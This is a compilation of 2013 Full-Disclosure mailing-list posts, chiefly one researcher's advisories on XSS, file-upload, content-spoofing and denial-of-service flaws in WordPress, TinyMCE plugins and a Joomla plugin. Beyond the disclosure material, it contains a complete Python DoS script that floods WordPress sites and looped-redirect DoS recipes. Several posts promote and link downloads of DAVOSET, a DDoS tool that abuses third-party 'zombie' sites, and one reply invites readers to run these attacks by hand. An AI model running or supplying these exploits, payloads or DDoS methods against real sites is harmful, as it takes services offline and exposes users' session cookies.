Hello list! These are Arbitrary File Uploading and Cross-Site Scripting vulnerabilities in TinyMCE Image Manager plugin for TinyMCE. - Affected products: - Vulnerable are TinyMCE Image Manager 1.1 and previous versions. - Affected vendors: - Dustweb http://dustweb.ru/projects/tinymce_images/ -- Details: -- Arbitrary File Uploading (WASC-31): The attack is possible via "1.asp" in folder name. This is bypass method for executing arbitrary code at IIS web server. TinyMCE Image Manager AFU.html TinyMCE Image Manager Arbitrary File Uploading exploit (C) 2013 MustLive. http://websecurity.com.ua action="http://site/tiny_mce/plugins/images/connector/php/"; method="post"> Cross-Site Scripting (WASC-08): This is persistent XSS on Linux/Unix and reflected XSS on Windows. The code will execute just after sending request for creating a folder and later on at requests to connector (at any operations, except creating a folder with existent name). TinyMCE Image Manager XSS.html TinyMCE Image Manager XSS exploit (C) 2013 MustLive. http://websecurity.com.ua action="http://site/tiny_mce/plugins/images/connector/php/"; method="post"> Timeline: 2013.05.22 - announced at my site. 2013.05.23 - informed developer. 2013.07.18 - disclosed at my site (http://websecurity.com.ua/6527/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DDoS attacks via other sites execution tool
Hello psy! I'm glad that you liked DOVOSET. And I'm glad that you liked my articles, including those old articles about attacks via redirectors (Redirectors' hell and Hellfire for redirectors). Such attacks can be used together with XSS holes. So it can be useful for your tool. Specially for using with your UFONet - to use XSS holes with looped redirectors to conduct more powerful DDoS attacks - I released advisory about Denial of Service vulnerabilities WordPress at 27.06.2013. Any redirector at any web site or any redirector service can be used with XSS vulnerabilities to conduct DDoS attack via UFONet. Curiously, I posted a tool written in python the same day. It is called: UFONet I made my tool already in 2010. That time I made an announcement of the tool, where I described DAVOSET and its effectiveness, but didn't release the tool. I made it private and gave it only to one security researcher, who wanted to look at it. I didn't want to give such kind of attacking tool to script kiddies (to prevent mass attacks, because there were a lot such Abuse of Functionality vulnerabilities in Internet, since 2007 when I start finding them and presented in zombies-lists with my tool). But because for three years people continue to ignore such holes and almost nobody fixed such holes (just few most serious ones, and even Yahoo lamerly ignored for a long time such hole in their Babelfish and in 2012 just lamerly closed it), so I decided to release it publicly in June 2013. My idea now, is to work the detection of new 'zombies' by crawlering techniques and increase the "strike" capability requests. Good ideas. But concerning automated searching XSS holes by crawlering. It'll be already XSS scanner, not just attacking tool for using existent vulnerabilities, and it'll give a lot of power to an attacker. No need for him to find XSS holes, your tool will do everything for him ;-). Just enter target site and UFONet will do all the work (find a lot of zombies and attack the target with all of them), so be careful with such functionality. I have seen that your tool doesn't allows the use of proxies. It may be interesting to add that functionality. Thanks for suggestion. I've added it to ToDo - in addition to all my ideas (which I have a lot). The reason, why I've not done it earlier and was not planning, is simple - DAVOSET is using other sites as proxies for conducting DoS attacks. So target sites after received DDoS attacks from multiple zombie sites will be seeing in logs only Google, W3C and other sites/IPs. So proxying is part of attack :-). But for paranoids, who worry that admins on zombie-sites will give their logs to admins of victim-sites (or not admins, but special services), then additional proxy will be good solution (and I'll add proxy support in the future). + Video: http://vimeo.com/68772290 I've seen your video. And I wrote you feedback about video and some feedback about UFONet last month. And will write more feedback soon. Keep working on your software. Concerning your release of v.0.2. Think about making more detailed changelog (not just mention concerning release of new version, but with detailed description of changes). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: "psy" To: "MustLive" Cc: ; Sent: Wednesday, June 19, 2013 10:25 PM Subject: Re: [Full-disclosure] DDoS attacks via other sites execution tool Hi, On 18/06/13 22:50, MustLive wrote: Hello participants of Mailing List. If you haven't read my article (written in 2010 and last week I wrote about it to WASC list) Advantages of attacks on sites with using other sites (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008846.html), feel free to do it. In this article I reminded you about using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html), DDoS attacks via other sites execution tool (DAVOSET) (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006832.html), sending spam via sites and creating spam-botnets (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html) and wrote about advantages of attacks on sites with using other sites. I have read the articles and they are very interesting, for example, the "hell" redirection. This kind of web abuse can be very powerful. Nice work! ;-) Last week I've published online my DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). It's tool for conducting of DDoS attacks via Abuse of Functionality vulnerabilities on the sites, which I've made in 2010. Description and changelog on English are presented at my site. Where you can get my DAVOSET v.1.0.5 (made at 18.0
[Full-disclosure] Multiple vulnerabilities in Googlemaps plugin for Joomla
Hello list! These are Denial of Service, XML Injection, Cross-Site Scripting and Full path disclosure vulnerabilities in Googlemaps plugin for Joomla. - Affected products: - Vulnerable are Googlemaps plugin for Joomla versions 2.x and 3.x and potentially previous versions. In new version of DAVOSET I'll add a lot of web sites with Googlemaps plugin. - Affected vendors: - Mike Reumer http://extensions.joomla.org/extensions/maps-a-weather/maps-a-locations/maps/1147 -- Details: -- Denial of Service (WASC-10): http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/large_file Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html). XML Injection (WASC-23): http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xml.xml It's possible to include external xml-files. Which also can be used for XSS attack: XSS via XML Injection (WASC-23): http://site/plugins/content/plugin_googlemap2_proxy.php?url=site2/xss.xml File xss.xml: XSS xmlns="http://www.w3.org/1999/xhtml";>alert(document.cookie) Cross-Site Scripting (WASC-08): http://site/plugins/content/plugin_googlemap2_proxy.php?url=%3Cbody%20onload=alert(document.cookie)%3E Full path disclosure (WASC-13): http://site/plugins/content/plugin_googlemap2_proxy.php Besides plugin_googlemap2_proxy.php, also happens plugin_googlemap3_proxy.php (but it has other path at web sites). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DAVOSET v.1.1
Hello participants of Mailing List. After making public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made next update of the software. Today DAVOSET v.1.1 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). Download DAVOSET v.1.1: http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.rar Use, don't abuse. Besides improvements and fixes in new version, in 1.1 there was added logging. So now people can log their activity with the tool. Also I've described usage of the tool in readme.txt - added descriptions of different attacks, which I wrote about in my articles. So it must become easier for new users of the program to understand it. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS and CS vulnerabilities in TinyMCE Image Manager
Hello list! These are Cross-Site Scripting and Content Spoofing vulnerabilities in TinyMCE Image Manager plugin for TinyMCE. - Affected products: - Vulnerable are TinyMCE Image Manager 1.1 and previous versions. - Affected vendors: - Dustweb http://dustweb.ru/projects/tinymce_images/ -- Details: -- Cross-Site Scripting (WASC-08): http://site/path/images/js/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);// http://site/path/images/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Content Spoofing (WASC-12): http://site/path/images/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E http://site/path/images/js/swfupload/swfupload.swf?buttonImageURL=http://demo.swfupload.org/v220/images/logo.gif Timeline: 2013.05.18 - announced at my site. 2013.05.18 - informed developer. 2013.07.12 - disclosed at my site (http://websecurity.com.ua/6517/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS, CS and FPD vulnerabilities in I Love It theme for WordPress
Hello list! These are Cross-Site Scripting, Content Spoofing and Full path disclosure vulnerabilities in I Love It theme for WordPress. This is commercial (premium) theme. - Affected products: - All versions of I Love It theme for WordPress. The theme contains vulnerable versions of Audio Player and GDD FLVPlayer. - Affected vendors: - CosmoThemes http://cosmothemes.com -- Details: -- Cross-Site Scripting (WASC-08): http://site/wp-content/themes/iloveit/lib/php/assets/player.swf?playerID=%22))}catch(e){alert(document.cookie)}// Content Spoofing (WASC-12): http://site/wp-content/themes/iloveit/flv/gddflvplayer.swf There are 10 vulnerabilities in GDD FLVPlayer: 8 CS and 2 XSS. Which I announced recently (http://websecurity.com.ua/6642/) and informed developers of GDD FLVPlayer. These vulnerabilities will be disclosed later. Full path disclosure (WASC-13): http://site/wp-content/themes/iloveit/ There are FPD vulnerabilities in index.php and other php-files (in folder and subfolders). Timeline: 2013.05.24 - informed CosmoThemes about vulnerabilities in their I Love It New theme. 2013.07.11 - disclosed at my site (http://websecurity.com.ua/6646/). 2013.07.12 - informed developers about vulnerabilities in their I Love It theme. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] CS, XSS and FPD vulnerabilities in WordPress
Hello list! These are Content Spoofing, Cross-Site Scripting and Full path disclosure vulnerabilities in WordPress. At WordPress 3.5.2 release (the same at 3.5.1 release), WP developers mentioned about multiple fixed holes, but not about all - to make it looks like there were less fixed holes. So I'm revealing this information for you. In March I wrote about Content Spoofing and Cross-Site Scripting vulnerabilities in SWFUpload (http://securityvulns.ru/docs29181.html) (which is also bundled with WordPress), and I mentioned that they concerned only versions before WordPress 3.3.2 and were fixed in version 3.3.2 together with 2012's XSS hole. But I checked these holes in older versions of WP and in version 3.5.1. And as I found two weeks ago, these CS and XSS vulnerabilities were fixed exactly in WordPress 3.5.1. So versions 3.3.2 - 3.5 are still vulnerable, and in version 3.5.1 the developers included updated version of SWFUpload, without mentioning about these fixes (they like to do such things), only mentioned about the fixes in SWFUpload in version WP 3.5.2. There are fixed vulnerabilities in WordPress 3.5.2, which are not mentioned in announcement and codex. Like below mentioned Full path disclosure vulnerability (which I disclosed last week), even they have mentioned about FPD during upload. - Affected products: - For CS and XSS vulnerable are versions WordPress 2.7 - 3.5. For FPD vulnerable are versions WordPress 3.4 - 3.5.1. -- Details: -- Content Spoofing (WASC-12): http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=test%3Cimg%20src=%27http://demo.swfupload.org/v220/images/logo.gif%27%3E It's possible to inject text, images and html (e.g. for link injection). Cross-Site Scripting (WASC-08): http://site/wp-includes/js/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E Code will execute after click. It's strictly social XSS. Full path disclosure (WASC-13): http://site/wp-admin/users.php?s=http:// There is FPD when search string starts from http:// or https://. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DAVOSET v.1.0.9
Hello participants of Mailing List. After making public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made next update of the software. On Friday, 05.07.2013, DAVOSET v.1.0.9 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). Download DAVOSET v.1.0.9: http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.0.9.rar Use, don't abuse. Among other improvements in new version, in 1.0.9 there was added support of CSRF tokens. And there was added new service into full lists of zombies (exactly for requests with CSRF tokens). This is browsershots.org, I wrote about vulnerabilities in it in 2010 and informed admins, which lamerly ignored to fix vulnerabilities (only added token, which is easy bypassed as I showed). One request to this service leads to 158 requests to target site. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DDoS attacks via other sites execution tool
Hello Julius! Looks like you haven't read my articles, which I referenced in my letter. Such as Using of the sites for attacks on other sites - this is my 2010's article based on my 2009's article DoS attacks via Abuse of Functionality vulnerabilities. In new article I combined different attacks (which can be used for attacks on other sites) and added new example of vulnerable sites to draw attention to this problem. Yes, it's brilliant. And not only GET requests - since DAVOSET v.1.0.8 the tool also supports POST requests ;-). My tool is designed to automate such attacks on other sites. If you want to do the attacks manually (with using all those vulnerable sites, including those in my lists of zombies), feel free to do it. Like to use them as proxies (to hiddenly visit sites), or to send CSRF requests for different attacks on those sites, or to make DoS attacks. Which are especially effective when there are many sites combined together, i.e. to make DDoS attacks, which are using not clients, but servers as zombies. Servers have larger channels, so they are more effective weapon for conducting DDoS attacks. And exactly for automating these things I've created my tool. Yes, it can be used for attacking with only one zombie-server, but it's good with making DDoS attacks with multiple-servers (it handles any amount of servers very well). For understanding possibilities of DoS attacks via AoF vulnerabilities it's needed to read those my 2009-2010's articles. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: Julius Kivimдki To: MustLive Cc: full-disclosure@lists.grok.org.uk Sent: Friday, June 21, 2013 7:36 PM Subject: Re: [Full-disclosure] DDoS attacks via other sites execution tool So you made a perl script to make GET requests on a list of URLs? Brilliant. 2013/6/18 MustLive Hello participants of Mailing List. If you haven't read my article (written in 2010 and last week I wrote about it to WASC list) Advantages of attacks on sites with using other sites (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008846.html), feel free to do it. In this article I reminded you about using of the sites for attacks on other sites (http://lists.grok.org.uk/pipermail/full-disclosure/2010-June/075384.html), DDoS attacks via other sites execution tool (DAVOSET) (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006832.html), sending spam via sites and creating spam-botnets (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-July/006863.html) and wrote about advantages of attacks on sites with using other sites. Last week I've published online my DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). It's tool for conducting of DDoS attacks via Abuse of Functionality vulnerabilities on the sites, which I've made in 2010. Description and changelog on English are presented at my site. Where you can get my DAVOSET v.1.0.5 (made at 18.07.2010). This is the last version of my DAVOSET. After that I've stopped its development. But now I am planning to continue development of the software and to release new versions (I'll release v.1.0.6 today). For three years I was holding this tool privately, but now released it for free access. So everyone can test Abuse of Functionality vulnerabilities at multiple web sites - like Google's sites, W3C and many others, which were informed by me many times during many years (I was informing admins of web sites about such vulnerabilities since 2007), but ignored and don't want to fix these holes for a long time, and for example Google continued to create new services with Abuse of Functionality and Insufficient Anti-automation vulnerabilities, which can be used for such DoS and DDoS attacks. It must bring attention to the danger of these vulnerabilities (which I was trying to do in my articles in 2010). Because in most cases owners of web sites and web developers ignore and don't fix them. Which can be used for DoS attacks as on other sites, as on the sites with Abuse of Functionality vulnerabilities themselves, about which I wrote in my article Using of the sites for attacks on other sites. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cross-Site Scripting vulnerabilities in WordPress
Hello list! These are Cross-Site Scripting vulnerabilities in WordPress. Which I've disclosed last week. At WordPress 3.5.2 release, WP developers mentioned about three holes as "security hardenings" (to decrease their importance and to make it looks like there were less fixed holes). One of these holes is "Cross-Site Scripting (XSS) when Editing Media". After I checked media editing functionality, I've found that it was not one hole, but two holes and these were persistent XSS. - Affected products: - Vulnerable are WordPress 3.5.1 and previous versions. -- Details: -- Cross-Site Scripting (WASC-08): These are persistent XSS vulnerabilities at page http://site/wp-admin/post.php?post=1&action=edit in parameters excerpt and content. For the attack it's needed to bypass protection against CSRF (to receive token _wpnonce, which can be done with using reflected XSS). WordPress 3.5.1 XSS-1.html WordPress 3.5.1 XSS exploit (C) 2013 MustLive. http://websecurity.com.ua http://site/wp-admin/post.php"; method="post"> value="alert(document.cookie)"> The code will execute just after sending request at the page http://site/wp-admin/post.php?post=1&action=edit and at subsequent visiting this page. WordPress 3.5.1 XSS-2.html WordPress 3.5.1 XSS exploit (C) 2013 MustLive. http://websecurity.com.ua http://site/wp-admin/post.php"; method="post"> value="alert(document.cookie)"> The code will execute just after sending request at the page http://site/wp-admin/post.php?post=1&action=edit and at subsequent visiting this page or the page http://site/page_name/attachment/1/. Timeline: 2013.06.21 - released WordPress 3.5.2. 2013.06.29 - disclosed at my site (http://websecurity.com.ua/6616/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Content Spoofing vulnerabilities in TinyMCE and WordPress
Hello list! This are Content Spoofing vulnerabilities in TinyMCE and WordPress. Which I've disclosed on Wednesday. In 2011 I already wrote about Content Spoofing in Moxieplayer, when I wrote concerning multiple vulnerabilities in TinyMCE (http://securityvulns.ru/docs27349.html), which is a component of Media plugin for TinyMCE (it's a part of core of TinyMCE). This visual editor is bundled with hundreds of web applications, particularly with WordPress. This flash file is bundled with WP since version 3.3. - Affected products: - Vulnerable are versions TinyMCE 3.4b2 - 4.0b3. For the first vulnerability versions WordPress 3.3 - 3.4.2 are vulnerable. For the second vulnerability versions WordPress 3.3 - 3.5.1 are vulnerable. This hole was fixed in WordPress 3.5.2 (note that WP developers incorrectly called this CS hole as XSS in announcement at their site, at that in codex they wrote correctly). -- Details: -- Content Spoofing (WASC-12): If previous vulnerability, which I found in 2011, looked the next (since TinyMCE 3.4b2 and in version 3.4.7 it was fixed): http://site/moxieplayer.swf?url=http://site2/1.flv Then recently new vulnerability was found (by Wan Ikram), which allows to bypass protection and conduct CS attack: http://site/moxieplayer.swf#?url=http://site2/1.flv In June this vulnerability was fixed. Updated version of Moxieplayer is present in TinyMCE 4.0. In WordPress the attack with using of this flash-file looks the next. The first variant (WP 3.3 - 3.4.2): http://site/wp-includes/js/tinymce/plugins/media/moxieplayer.swf?url=http://site2/1.flv The second variant (WP 3.3 - 3.5.1): http://site/wp-includes/js/tinymce/plugins/media/moxieplayer.swf#?url=http://site2/1.flv Timeline: 2013.06.21 - released WP 3.5.2 with updated version of Moxieplayer. 2013.06.26 - disclosed at my site (http://websecurity.com.ua/6604/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WordPress Denial of Service exploit
Hello list! Here is my version of vnd's PoC (https://vndh.net/note:wordpress-351-denial-service). This exploit is for Denial of Service vulnerability in WordPress 3.4 - 3.5.1. My version solves some issues in original PoC. Concerning this Denial of Service in WordPress. As I wrote last week in my post concerning release of WordPress 3.5.2, this issue concerns both posts and pages which are password protected. Not only posts as vnd wrote and similarly WP guys wrote at their site (in WP 3.5.2 announcement and in the codex). Since WordPress supports password at both posts and pages, as I wrote in 2010 concerning Brute Force and Insufficient Authorization vulnerabilities in WordPress (http://www.securityfocus.com/archive/1/510274). wordpress-dos.py # WordPress Denial of Service exploit # WordPress 3.4 - 3.5.1 # Author: vnd at vndh.net # Version by MustLive (http://websecurity.com.ua) import httplib import re def get_cookie_hash(hostname, url): headers = {'Content-type': 'application/x-www-form-urlencoded'} handler = httplib.HTTPConnection(hostname) handler.request('POST', url, 'post_password=', headers=headers) response = handler.getresponse() set_cookie = response.getheader('set-cookie') if set_cookie is None: raise RuntimeError('cannot fetch set-cookie header') pattern = re.compile('wp-postpass_([0-9a-f]{32})') result = pattern.search(set_cookie) if result is None: raise RuntimeError('cannot fetch cookie hash') return result.groups()[0] def send_request(hostname, post, cookie_name): headers = {'Cookie': 'wp-postpass_%s=%%24P%%24Spaddding' % cookie_name} handler = httplib.HTTPConnection(hostname) handler.request('GET', post, 'action=postpass&post_password=a', headers=headers) if __name__ == '__main__': hostname = 'site' posturl = '/?p=4' # link to password protected post or page requests = 1000 pattern = re.compile('(.+/)') url = pattern.search(posturl).groups()[0] + 'wp-pass.php' cookie_hash = get_cookie_hash(hostname, url) print '[+] received cookie hash: %s' % cookie_hash for i in xrange(requests): print '[+] sending request %d...' % (i + 1) send_request(hostname, posturl, cookie_hash) Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Denial of Service in WordPress
Hello Michal! Yes, of course there are a lot of ways to make cross-site requests. But what is a benefit in using Looped DoS - do you see it? Looks like don't. I'll explain for you. One standard request (via img and other tags in HTML, etc.) leads to single request to target site. One request with using of Looped DoS hole (such hole by itself or artificially created from looping two redirectors) leads to 21 requests - in case of using redirector/redirectors with server headers (after 21st request modern browsers will stop it). And in case if there will be old IE or "unlimited bot" or there will be used my bypass techniques (using JS or meta-refresh at least in one from two redirectors) to bypass browsers restriction - one request leads to infinite number of requests. I.e. this is 21 times / infinite times more effective for attack. And besides using of link, frame or iframe to lead to Looped DoS, it's also possible to use other standard methods for making request. Such as img or other tags (in this case only server headers redirectors must be used). Which creates 21 (for modern browsers) or infinite number of requests (for old IE) from one image. Put a lot of images on forums and other sites, which allow img tag (via html or bbcode) to Looped DoS and there will be a lot of requests from single visitor of that page. Browsers detect redirect loops to prevent accidental mishaps and simplify troubleshooting, not to stop malicious attacks. Yes, you are right. But exactly this functionality to stop redirect loops (in all modern browsers) can help mitigate such attacks. Just not all techniques of this attack. Also remember that your company's browser Chrome (and some other vendors too) was trying to prevent looped redirect with using JS, but not good enough - as I showed in my Refresh DoS attack in 2008 in my project Day of bugs in browsers. So browsers vendors need to improve their redirect loops protection. Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: "Michal Zalewski" To: "MustLive" Cc: "Ryan Dewhurst" ; "full-disclosure" Sent: Friday, June 28, 2013 9:19 AM Subject: Re: [Full-disclosure] Denial of Service in WordPress Attack exactly overload web sites presented in endless loop of redirects. As I showed in all cases of Looped DoS vulnerabilities in web sites and web applications, which I wrote about during 2008 (when I created this type of attacks) - 2013. You do realize that any browser can be made to issue a *lot* of requests to any other destination on the web - say, by instantiating a bunch of images, leveraging CORS, navigating iframes, etc? Browsers detect redirect loops to prevent accidental mishaps and simplify troubleshooting, not to stop malicious attacks. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DAVOSET v.1.0.8
Hello participants of Mailing List. After making public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made next update of the software. On Friday, 28.06.2013, DAVOSET v.1.0.8 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/). Download DAVOSET v.1.0.8: http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.0.8.rar Use, don't abuse. Among other improvements in new version, in 1.0.8 there was added support of POST requests. So now you can use Abuse of Functionality vulnerabilities at web sites which require POST. Also there was added new service into both lists of zombies (exactly for POST requests). With adding of support of POST requests to vulnerable sites, also the format of the file with list of zombie-servers was changed. New format of the file is backward-compatible with previous format. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Denial of Service in WordPress
ress, including WP 3.5.2). The more time people spend on particular page with injected iframe with endless redirect and the more people are visiting such sites, the more effect will be. No need to ask people to "participate in DoS attack", their browser will be automatically "participating" via Looped DoS attack (just by entering in any way this endless loop). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: Ryan Dewhurst To: MustLive Cc: submissi...@packetstormsecurity.org ; full-disclosure ; 1337 Exploit DataBase Sent: Thursday, June 27, 2013 8:34 PM Subject: Re: [Full-disclosure] Denial of Service in WordPress This just affects the client though right? So doesn't DoS a WordPress blog, just presents an error message to the user if they click on a crafted link. How could this be used in the real world to cause any risk? From my understanding you'd have to get the user to click on the tinyurl, which would then show them a browser redirect error? If this is the case, how does this benefit an attacker? On Thu, Jun 27, 2013 at 7:28 PM, MustLive wrote: Hello list! These are Denial of Service vulnerabilities WordPress. Which I've disclosed two days ago (http://websecurity.com.ua/6600/). About XSS vulnerabilities in WordPress, which exist in two redirectors, I wrote last year (http://seclists.org/fulldisclosure/2012/Mar/343). About Redirector vulnerabilities in these WP scripts I wrote already in 2007 (and made patches for them). The developers fixed redirectors in WP 2.3, so Redirector and XSS attacks are possible only in previous versions. As I've recently checked, this functionality can be used for conducting DoS attacks. I.e. to make Looped DoS vulnerabilities from two redirectors (according to Classification of DoS vulnerabilities in web applications (http://websecurity.com.ua/2663/)), by combining web site on WordPress with redirecting service or other site. This attack is similar to looping two redirectors, described in my articles Redirectors' hell and Hellfire for redirectors. The interesting, that looped redirector (http://tinyurl.com/hellfire-url), which I've made at 5th of February 2009 for my article Hellfire for redirectors, is still working. - Affected products: - Vulnerable are all versions of WordPress: for easy attack - WP 2.2.3 and previous versions, for harder attack - WP 3.5.2 and previous versions. The second variant of attack requires Redirector or XSS vulnerability at the same domain, as web site on WP. -- Details: -- Denial of Service (WASC-10): It's needed to create Custom alias at tinyurl.com or other redirector service, which will be leading to wp-login.php or wp-pass.php with setting alias for redirection. http://site/wp-login.php?action=logout&redirect_to=http://tinyurl.com/loopeddos1 http://site/wp-pass.php?_wp_http_referer=http://tinyurl.com/loopeddos2 Here are examples of these vulnerabilities: http://tinyurl.com/loopeddos1 http://tinyurl.com/loopeddos2 This attack will work for WordPress < 2.3. At that Mozilla, Firefox, Chrome and Opera will stop endless redirect after series of requests, unlike IE. To make this attack work in all versions of the engine, including WordPress 3.5.2, it's needed that redirector was on the same domain, as web site on WP. For this it can be used any vulnerability, e.g. reflected XSS or persistent XSS (at the same domain), for including a script for redirecting to one of these redirectors: WordPress_Looped_DoS.html document.location="<a rel="nofollow" href="http://site/wp-login.php?action=logout&redirect_to=http://site/WordPress_Looped_DoS.html"">http://site/wp-login.php?action=logout&redirect_to=http://site/WordPress_Looped_DoS.html"</a>; WordPress_Looped_DoS-2.html document.location="<a rel="nofollow" href="http://site/wp-pass.php"">http://site/wp-pass.php"</a>; This attack will work as in WordPress 3.5.2 and previous versions, as it isn't stopping by the browsers (endless redirect). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Denial of Service in WordPress
Hello list! These are Denial of Service vulnerabilities WordPress. Which I've disclosed two days ago (http://websecurity.com.ua/6600/). About XSS vulnerabilities in WordPress, which exist in two redirectors, I wrote last year (http://seclists.org/fulldisclosure/2012/Mar/343). About Redirector vulnerabilities in these WP scripts I wrote already in 2007 (and made patches for them). The developers fixed redirectors in WP 2.3, so Redirector and XSS attacks are possible only in previous versions. As I've recently checked, this functionality can be used for conducting DoS attacks. I.e. to make Looped DoS vulnerabilities from two redirectors (according to Classification of DoS vulnerabilities in web applications (http://websecurity.com.ua/2663/)), by combining web site on WordPress with redirecting service or other site. This attack is similar to looping two redirectors, described in my articles Redirectors' hell and Hellfire for redirectors. The interesting, that looped redirector (http://tinyurl.com/hellfire-url), which I've made at 5th of February 2009 for my article Hellfire for redirectors, is still working. - Affected products: - Vulnerable are all versions of WordPress: for easy attack - WP 2.2.3 and previous versions, for harder attack - WP 3.5.2 and previous versions. The second variant of attack requires Redirector or XSS vulnerability at the same domain, as web site on WP. -- Details: -- Denial of Service (WASC-10): It's needed to create Custom alias at tinyurl.com or other redirector service, which will be leading to wp-login.php or wp-pass.php with setting alias for redirection. http://site/wp-login.php?action=logout&redirect_to=http://tinyurl.com/loopeddos1 http://site/wp-pass.php?_wp_http_referer=http://tinyurl.com/loopeddos2 Here are examples of these vulnerabilities: http://tinyurl.com/loopeddos1 http://tinyurl.com/loopeddos2 This attack will work for WordPress < 2.3. At that Mozilla, Firefox, Chrome and Opera will stop endless redirect after series of requests, unlike IE. To make this attack work in all versions of the engine, including WordPress 3.5.2, it's needed that redirector was on the same domain, as web site on WP. For this it can be used any vulnerability, e.g. reflected XSS or persistent XSS (at the same domain), for including a script for redirecting to one of these redirectors: WordPress_Looped_DoS.html document.location="<a rel="nofollow" href="http://site/wp-login.php?action=logout&redirect_to=http://site/WordPress_Looped_DoS.html"">http://site/wp-login.php?action=logout&redirect_to=http://site/WordPress_Looped_DoS.html"</a>; WordPress_Looped_DoS-2.html document.location="<a rel="nofollow" href="http://site/wp-pass.php"">http://site/wp-pass.php"</a>; This attack will work as in WordPress 3.5.2 and previous versions, as it isn't stopping by the browsers (endless redirect). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: 